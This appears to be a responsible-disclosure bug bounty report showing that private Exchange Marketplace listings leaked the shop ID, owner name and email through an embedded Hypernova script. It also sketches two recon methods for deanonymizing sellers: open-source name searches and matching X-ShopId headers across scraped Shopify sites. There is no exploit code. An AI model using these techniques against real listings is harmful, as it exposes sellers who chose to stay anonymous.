H1514 Deanonymizing Exchange Marketplace private listings

**Summary:** [Exchange Marketplace](https://exchangemarketplace.com/) allows Shop owners to sell their business in a easy way. When placing the shop in the listings, the owner has the option to place their store as a private listing - where only stats will be displayed, and no information about the actual Shop, domain name or shop owned are visible. Inspecting the source code I discovered a <script> element generated by [Hypernova](https://github.com/airbnb/hypernova) which discloses the aforementioned private data: - Shop ID - Shop Owner name - Shop owner email ## Steps To Reproduce: To find the script, first pick a private listing e.g. [930273](https://exchangemarketplace.com/shops/e834b11e056bd114f8262d0464a512c9). Then search the DOM for a <script> element containing the 'data-hypernova-key' string: {F357502} We'll have a long JSON available containing the variables mentioned: {F357509} {F357510} This only discloses some data, but it's enough to pinpoint what the real Shop is, using some recon. The first method is with open intel - we have the Shop owner name and email. Most of the business will be registered in Linkedin so, a search there or using Google should be suffice to have a match. The second method is much more reliable and can be made via multiple ways, let's describe the easiest. Firstly, an attacker downloads a dataset of all known websites using Shopify, using something like [Wappalyzer](https://www.wappalyzer.com) or [BuiltWith](https://builtwith.com): {F357514} With that dataset he'll fetch every page and observe the response headers, where the X-ShopId header is present: {F357515} Now the attacker would have a direct match of Shop -> ShopID, thus deanonymizing the private listing. I believe it's fair to assume that if a Shop is being sold on the Marketplace it will have a decent amount of traffic. Thus, it should definitely be present in any of these available datasets. ## Impact An attacker can deanonymize private listings in Marketplace, finding out who the Shop Owner/Seller is and what is the business.